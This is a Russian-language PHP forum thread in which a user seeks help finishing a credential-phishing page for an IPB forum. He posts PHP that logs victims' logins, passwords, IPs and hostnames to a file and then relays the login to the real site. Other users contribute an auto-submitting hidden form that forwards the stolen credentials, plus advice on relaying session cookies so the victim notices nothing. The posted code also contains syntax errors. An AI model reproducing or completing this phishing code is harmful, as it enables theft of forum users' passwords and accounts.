Авторизация на форуме через Curl

Тема в разделе "PHP", создана пользователем FroshaS, 27 апр 2009.

Статус темы:
Закрыта.
Модераторы: latteo
  1. FroshaS

    FroshaS Создатель

    Регистр.:
    14 мар 2009
    Сообщения:
    29
    Симпатии:
    2
    Составляю с помощью PHP сниффер для перехвата паролей с форума IPB 2.3.6.
    Формочку составил, проблема осталась с авторизацией и переадресацией на настоящий форум.
    То есть на настоящем форуме хочу поменять формочку авторизацию, чтобы пароли улетали на фейковый адрес, сохранялись, а затем происходила авторизация.
    Получилось, примерно так. Но авторизации не происходит.
    PHP:
    <?PHP 
    if (isset($_POST['UserName']) and isset($_POST['PassWord']));
    $Login $_POST['UserName']; 
    $Pass $_POST['PassWord']; 
    $text "Логин:$Login Пасс:$Pass";
    $Port getenv("REMOTE_PORT");
    $Connect $_SERVER['HTTP_CONNECTION'];
    $Host gethostbyaddr(getenv("REMOTE_ADDR")); 
    $Pass $_POST['PassWord']; // Пароль
    $ip $_SERVER["REMOTE_ADDR"]; // IP Жертвы
    $Data date("d-m-y H:i:s"time()); // Дата и время

    $text "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip  Login:$Login Пасс:$Pass";
    $filelog fopen("base.php","a+"); //открываем файл базы
    fwrite($filelog,"\n $text \n"); //записываем всё

    fclose($filelog); //закрываем

    set_time_limit(0); 


    $Login $_POST['UserName']; 
    $Pass $_POST['PassWord']; 
    $hostname="www.feik.ru";
    $path="/fopur/index.php?act=Login&CODE=01"
    $fp fsockopen($hostname,80);  
    if(!
    $fp){ 
    echo
    "Ошибка подключения"

    else{  
    $data "index.php?act=Login&CODE=01\r\n\r\n"// отправляемые даные! 
    $headers "POST $path HTTP/1.1\r\n";  
    $headers .= "Host: realsite.ru\r\n";  
    $headers .= "Connection: close\r\n";  
    $headers .= "User-Agent: Opera/9.20 (Windows NT 6.0; U; en)\r\n";  
    $headers .= "Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,* /*;q=0.5\r\n";  
    $headers .= "Accept-Language: en-us,en;q=0.5\r\n";  
    $headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";  
    $headers .= "Referer: http://realsite.ru/forum/index.php\r\n";
    $headers .= "Content-Type: application/x-www-form-urlencoded\r\n";  
      
    $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";  

    fputs($fp,$headers.$data);  

    while(!
    feof($fp)) 
     { 
     
    $a=fread($fp,1000);
    echo 
    $a;
     }
     }
       
    fclose($fp);  

    ?>
    <html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://realsite.ru/forum/index.php?act=Login&CODE=01'></head></html>;
    ?>
     
  2. alexz15

    alexz15

    Регистр.:
    3 окт 2008
    Сообщения:
    394
    Симпатии:
    189
    а если сделать так?:
    PHP:
    //тут перехватываем данные
    ...
    // а затем происходит простая переадресация на javascript на настоящий форум
    echo "<form name='form1' method='post' action='http://realsite.ru/forum/index.php'>
    <input type='hidden' value='"
    .$Login."' name='Login'>
    <input type='hidden' value='"
    .$Pass."' name='Pass'> 
    Выполняется переадресация. Если этого не происходит, <input type='submit' value='нажмите сюда'>
    <script>
    document.form1.submit();
    </script>
    </form>"
    ;
     
  3. Alexitdv

    Alexitdv

    Регистр.:
    4 янв 2008
    Сообщения:
    161
    Симпатии:
    65
    1. Нафиг ты юзаешь сокеты, а в теме написано, что через курл?
    2. Для авторизации, тебе нужно отправить запрос на страницу IPB, потом спарсить из заголовков Set-Cookie и выплюнуть их все клиенту, который попался на фейк.
    3. Переадрисовать редиректом на главную страницу форума.
     
  4. dzumon

    dzumon Прохожие

    ага с кукиесам поразбирайся в curl-е
    вполне можно реализовать
     
Статус темы:
Закрыта.